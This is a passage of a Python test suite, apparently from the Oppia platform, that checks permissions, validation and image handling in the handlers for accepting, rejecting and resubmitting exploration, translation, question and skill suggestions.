'content', '<p>new content html</p>').to_dict()
change_cmd = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'new_value': new_content
}
suggestion_services.create_suggestion(
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT,
feconf.ENTITY_TYPE_EXPLORATION, exp_id, 1,
self.editor_id, change_cmd, 'sample description')
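        # The owner authored this suggestion on their own exploration, so the
        # reject action below must fail with a 401.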
suggestion_id = suggestion_services.query_suggestions(
[('author_id', self.editor_id), (
'target_id', exp_id)])[0].suggestion_id
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
exp_id, suggestion_id), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=401)
self.assertEqual(
response['error'], 'You cannot accept/reject your own suggestion.')
self.logout()
def test_suggestion_to_exploration_handler_with_invalid_action(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']),
{'action': 'invalid_action'}, csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid action.')
self.logout()
def test_reject_suggestion_to_exploration(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_reject = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_reject['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_reject['target_id'],
suggestion_to_reject['suggestion_id']), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token)
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_reject['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_REJECTED)
self.logout()
    def test_suggestion_to_exploration_handler_with_long_commit_message(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
response = self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message':
u'a' * (feconf.MAX_COMMIT_MESSAGE_LENGTH + 1),
'review_message': u'Accepted'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'Commit messages must be at most 1000 characters long.'
)
def test_accept_suggestion(self):
exploration = exp_fetchers.get_exploration_by_id(self.EXP_ID)
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
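        # Enable score recording so that accepting this suggestion raises the
        # author's score to the review threshold; that author then accepts
        # another user's suggestion later in this test.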
enable_recording_of_scores_swap = self.swap(
feconf, 'ENABLE_RECORDING_OF_SCORES', True)
increment_score_of_author_swap = self.swap(
suggestion_models, 'INCREMENT_SCORE_OF_AUTHOR_BY',
feconf.MINIMUM_SCORE_REQUIRED_TO_REVIEW)
with enable_recording_of_scores_swap, increment_score_of_author_swap:
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
exploration = exp_fetchers.get_exploration_by_id(self.EXP_ID)
self.assertEqual(
exploration.states[suggestion_to_accept[
'change']['state_name']].content.html,
suggestion_to_accept['change']['new_value']['html'])
self.logout()
# Testing user without permissions cannot accept.
self.login(self.NORMAL_USER_EMAIL)
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token, expected_status_int=401)
self.logout()
# Testing that author cannot accept own suggestion.
self.login(self.AUTHOR_EMAIL_2)
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token, expected_status_int=401)
# Testing users with scores above threshold can accept.
# The score of this author was increased to the review threshold amount
# when the editor accepted a suggestion that was authored by this user.
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][0]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
self.logout()
# Testing admins can accept suggestions.
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][1]
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][1]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
self.logout()
def test_suggestion_list_handler_with_invalid_query_field(self):
response = self.get_json(
'%s?invalid_query_field=value' % (
feconf.SUGGESTION_LIST_URL_PREFIX), expected_status_int=400)
self.assertEqual(
response['error'],
'Not allowed to query on field invalid_query_field')
def test_suggestion_list_handler(self):
suggestions = self.get_json(
'%s?author_id=%s&target_type=%s&target_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX, self.author_id_2,
feconf.ENTITY_TYPE_EXPLORATION, self.EXP_ID)
)['suggestions']
self.assertEqual(len(suggestions), 2)
def test_cannot_resubmit_suggestion_with_invalid_suggestion_id(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/resubmit/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, 'invalid_suggestion_id'), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'No suggestion found with given suggestion id')
def test_resubmit_rejected_suggestion(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion = suggestion_services.query_suggestions(
[('author_id', self.author_id), ('target_id', self.EXP_ID)])[0]
suggestion_services.reject_suggestion(
suggestion.suggestion_id, self.reviewer_id, 'reject message')
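        # Only a rejected suggestion can be resubmitted; the author resubmits
        # it with updated content below.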
self.logout()
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json('%s/resubmit/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, suggestion.suggestion_id), {
'summary_message': 'summary message',
'action': u'resubmit',
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'new_value': self.resubmit_change_content,
'old_value': self.old_content
}
}, csrf_token=csrf_token)
suggestion = suggestion_services.query_suggestions(
[('author_id', self.author_id), ('target_id', self.EXP_ID)])[0]
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
self.assertEqual(
suggestion.change.new_value['html'],
self.resubmit_change_content['html'])
self.assertEqual(
suggestion.change.cmd, exp_domain.CMD_EDIT_STATE_PROPERTY)
self.assertEqual(
suggestion.change.property_name, exp_domain.STATE_PROPERTY_CONTENT)
self.assertEqual(
suggestion.change.state_name, 'State 1')
self.logout()
def test_translation_accept_suggestion_by_reviewer(self):
# Test reviewer can accept successfully.
self.login(self.REVIEWER_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.translator_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.translator_id))['suggestions'][0]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
self.logout()
def test_translation_suggestion_creation_with_new_images(self):
exp_id = '12345678exp1'
exploration = (
self.save_new_linear_exp_with_state_names_and_interactions(
exp_id, self.editor_id, ['State 1'],
['EndExploration'], category='Algebra'))
state_content_dict = {
'content_id': 'content',
'html': (
'<oppia-noninteractive-image filepath-with-value='
'""img.png"" caption-with-value="""" '
'alt-with-value=""Image"">'
'</oppia-noninteractive-image>')
}
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
with python_utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'img.png'),
'rb', encoding=None) as f:
raw_image = f.read()
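        # Upload the image to the exploration first so that the content HTML
        # set below can reference it by filename.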
self.post_json(
'%s/exploration/%s' % (self.IMAGE_UPLOAD_URL_PREFIX, exp_id),
{'filename': 'img.png'},
csrf_token=csrf_token,
upload_files=(('image', 'unused_filename', raw_image),))
exp_services.update_exploration(
self.editor_id, exp_id, [exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'new_value': state_content_dict
})], 'Changes content.')
rights_manager.publish_exploration(self.editor, exp_id)
exploration = exp_fetchers.get_exploration_by_id(exp_id)
text_to_translate = exploration.states['State 1'].content.html
self.logout()
fs = fs_domain.AbstractFileSystem(
fs_domain.GcsFileSystem(feconf.ENTITY_TYPE_EXPLORATION, exp_id))
self.assertTrue(fs.isfile('image/img.png'))
self.login(self.TRANSLATOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT),
'target_type': feconf.ENTITY_TYPE_EXPLORATION,
'target_id': exp_id,
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_ADD_TRANSLATION,
'state_name': 'State 1',
'content_id': 'content',
'language_code': 'hi',
'content_html': text_to_translate,
'translation_html': (
'<oppia-noninteractive-image filepath-with-value='
'""translation_image.png"" '
'caption-with-value="""" '
'alt-with-value=""Image"">'
'</oppia-noninteractive-image>')
},
}, csrf_token=csrf_token,
upload_files=(
('translation_image.png', 'translation_image.png', raw_image), )
)
fs = fs_domain.AbstractFileSystem(
fs_domain.GcsFileSystem(
feconf.IMAGE_CONTEXT_EXPLORATION_SUGGESTIONS, exp_id))
self.assertTrue(fs.isfile('image/img.png'))
        self.assertTrue(fs.isfile('image/img_compressed.png'))
        self.assertTrue(fs.isfile('image/translation_image.png'))
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.translator_id))['suggestions'][0]
self.logout()
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'Translated content of State 1',
'review_message': u'This looks good!',
}, csrf_token=csrf_token)
fs = fs_domain.AbstractFileSystem(
fs_domain.GcsFileSystem(feconf.ENTITY_TYPE_EXPLORATION, exp_id))
self.assertTrue(fs.isfile('image/img.png'))
self.assertTrue(fs.isfile('image/translation_image.png'))
self.assertTrue(fs.isfile('image/img_compressed.png'))
class QuestionSuggestionTests(test_utils.GenericTestBase):
AUTHOR_EMAIL = 'author@example.com'
AUTHOR_EMAIL_2 = 'author2@example.com'
# Needs to be 12 characters long.
SKILL_ID = 'skill1234567'
SKILL_DESCRIPTION = 'skill to link question to'
def setUp(self):
super(QuestionSuggestionTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
self.save_new_skill(
self.SKILL_ID, self.admin_id, description=self.SKILL_DESCRIPTION)
self.question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': [self.SKILL_ID],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.SKILL_ID,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token)
self.logout()
def test_query_question_suggestions(self):
suggestions = self.get_json(
'%s?suggestion_type=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
feconf.SUGGESTION_TYPE_ADD_QUESTION)
)['suggestions']
self.assertEqual(len(suggestions), 1)
suggestion = suggestions[0]
self.assertEqual(
suggestion['suggestion_type'],
feconf.SUGGESTION_TYPE_ADD_QUESTION)
self.assertEqual(suggestion['target_id'], self.SKILL_ID)
self.assertEqual(
suggestion['target_type'], feconf.ENTITY_TYPE_SKILL)
self.assertEqual(
suggestion['change']['cmd'],
question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION)
def test_accept_question_suggestion(self):
suggestion_to_accept = self.get_json(
'%s?suggestion_type=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
feconf.SUGGESTION_TYPE_ADD_QUESTION)
)['suggestions'][0]
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
self.put_json('%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'This looks good!',
'skill_id': self.SKILL_ID
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?suggestion_type=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
feconf.SUGGESTION_TYPE_ADD_QUESTION)
)['suggestions'][0]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
        questions, merged_question_skill_links, _ = (
            question_services.get_displayable_question_skill_link_details(
                1, [self.SKILL_ID], ''))
self.assertEqual(len(questions), 1)
self.assertEqual(
merged_question_skill_links[0].skill_descriptions,
[self.SKILL_DESCRIPTION])
self.assertEqual(
merged_question_skill_links[0].skill_difficulties, [0.3])
self.assertEqual(
questions[0].question_content,
self.question_dict['question_state_data']['content']['html']
)
thread_messages = feedback_services.get_messages(
suggestion_to_accept['suggestion_id'])
        last_message = thread_messages[-1]
self.assertEqual(last_message.text, 'This looks good!')
def test_suggestion_creation_with_valid_images(self):
self.save_new_skill(
'skill_id2', self.admin_id, description='description')
question_state_data_dict = self._create_valid_question_data(
'default_state').to_dict()
valid_html = (
'<oppia-noninteractive-math math_content-with-value="{&q'
'uot;raw_latex&quot;: &quot;(x - a_1)(x - a_2)(x - a'
'_3)...(x - a_n-1)(x - a_n)&quot;, &quot;svg_filenam'
'e&quot;: &quot;file.svg&quot;}"></oppia-noninte'
'ractive-math>'
)
question_state_data_dict['content']['html'] = valid_html
self.question_dict = {
'question_state_data': question_state_data_dict,
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_id2'],
'inapplicable_skill_misconception_ids': []
}
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
with python_utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'test_svg.svg'),
'rb', encoding=None) as f:
raw_image = f.read()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.SKILL_ID,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token, upload_files=(
('file.svg', 'file.svg', raw_image), ))
self.logout()
def test_suggestion_creation_when_images_are_not_provided(self):
self.save_new_skill(
'skill_id2', self.admin_id, description='description')
question_state_data_dict = self._create_valid_question_data(
'default_state').to_dict()
valid_html = (
'<oppia-noninteractive-math math_content-with-value="{&q'
'uot;raw_latex&quot;: &quot;(x - a_1)(x - a_2)(x - a'
'_3)...(x - a_n-1)(x - a_n)&quot;, &quot;svg_filenam'
'e&quot;: &quot;file.svg&quot;}"></oppia-noninte'
'ractive-math>'
)
question_state_data_dict['content']['html'] = valid_html
self.question_dict = {
'question_state_data': question_state_data_dict,
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_id2'],
'inapplicable_skill_misconception_ids': []
}
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
response_dict = self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.SKILL_ID,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertIn(
'No image data provided for file with name file.svg.',
response_dict['error'])
self.logout()
def test_suggestion_creation_when_images_are_not_valid(self):
self.save_new_skill(
'skill_id2', self.admin_id, description='description')
question_state_data_dict = self._create_valid_question_data(
'default_state').to_dict()
valid_html = (
'<oppia-noninteractive-math math_content-with-value="{&q'
'uot;raw_latex&quot;: &quot;(x - a_1)(x - a_2)(x - a'
'_3)...(x - a_n-1)(x - a_n)&quot;, &quot;svg_filenam'
'e&quot;: &quot;file.svg&quot;}"></oppia-noninte'
'ractive-math>'
)
question_state_data_dict['content']['html'] = valid_html
self.question_dict = {
'question_state_data': question_state_data_dict,
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_id2'],
'inapplicable_skill_misconception_ids': []
}
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
large_image = '<svg><path d="%s" /></svg>' % (
'M150 0 L75 200 L225 200 Z ' * 4000)
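        # Repeating the path segment 4000 times yields an SVG comfortably over
        # the 100 KB image size limit checked below.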
response_dict = self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.SKILL_ID,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token,
upload_files=(
('file.svg', 'file.svg', large_image),),
expected_status_int=400)
self.assertIn(
'Image exceeds file size limit of 100 KB.',
response_dict['error'])
self.logout()
class SkillSuggestionTests(test_utils.GenericTestBase):
AUTHOR_EMAIL = 'author@example.com'
REVIEWER_EMAIL = 'reviewer@example.com'
def setUp(self):
super(SkillSuggestionTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
user_services.allow_user_to_review_question(self.reviewer_id)
self.skill_id = skill_services.get_new_skill_id()
self.save_new_skill(
self.skill_id, self.admin_id, description='Description')
self.question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': [self.skill_id],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.skill_id,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.skill_id,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token)
self.logout()
def test_cannot_access_suggestion_to_skill_handler(self):
self.login(self.ADMIN_EMAIL)
thread_id = feedback_services.create_thread(
feconf.ENTITY_TYPE_QUESTION, self.skill_id,
self.author_id, 'description', '', has_suggestion=True)
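        # The thread is flagged as having a suggestion, but no suggestion model
        # actually exists for it, so acting on it should return a 400.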
csrf_token = self.get_new_csrf_token()
self.put_json(
'%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, self.skill_id,
thread_id), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.logout()
def test_suggestion_to_skill_handler_with_invalid_target_type(self):
self.login(self.ADMIN_EMAIL)
exp_id = 'new_exp_id'
self.save_new_default_exploration(exp_id, self.admin_id)
new_content = state_domain.SubtitledHtml(
'content', '<p>new content html</p>').to_dict()
change_cmd = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'new_value': new_content
}
suggestion_services.create_suggestion(
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT,
feconf.ENTITY_TYPE_EXPLORATION, exp_id, 1,
self.author_id, change_cmd, 'sample description')
suggestion_id = suggestion_services.query_suggestions(
[('author_id', self.author_id), (
'target_id', exp_id)])[0].suggestion_id
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
response = self.put_json(
'%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
self.skill_id, suggestion_id), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'This handler allows actions only on suggestions to skills.')
self.logout()
def test_suggestion_to_skill_handler_with_invalid_target_id(self):
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
response = self.put_json(
'%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
'skill_id', suggestion_to_accept['suggestion_id']),
{
'action': u'reject',
'review_message': u'Rejected!'
},
csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'The skill id provided does not match the skill id '
'present as part of the suggestion_id')
self.logout()
def test_suggestion_to_skill_handler_with_invalid_action(self):
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
response = self.put_json(
'%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']),
{'action': 'invalid_action'}, csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid action.')
self.logout()
def test_reject_suggestion_to_skill(self):
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_reject = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_reject['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
self.put_json('%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_reject['target_id'],
suggestion_to_reject['suggestion_id']), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token)
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_reject['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_REJECTED)
self.logout()
def test_accept_suggestion_to_skill(self):
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_accept['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
self.put_json('%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted!',
'skill_id': self.skill_id
}, csrf_token=csrf_token)
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_accept['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_ACCEPTED)
self.logout()
def test_reviewer_accept_suggestion_to_skill(self):
self.login(self.REVIEWER_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_accept['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
self.put_json('%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
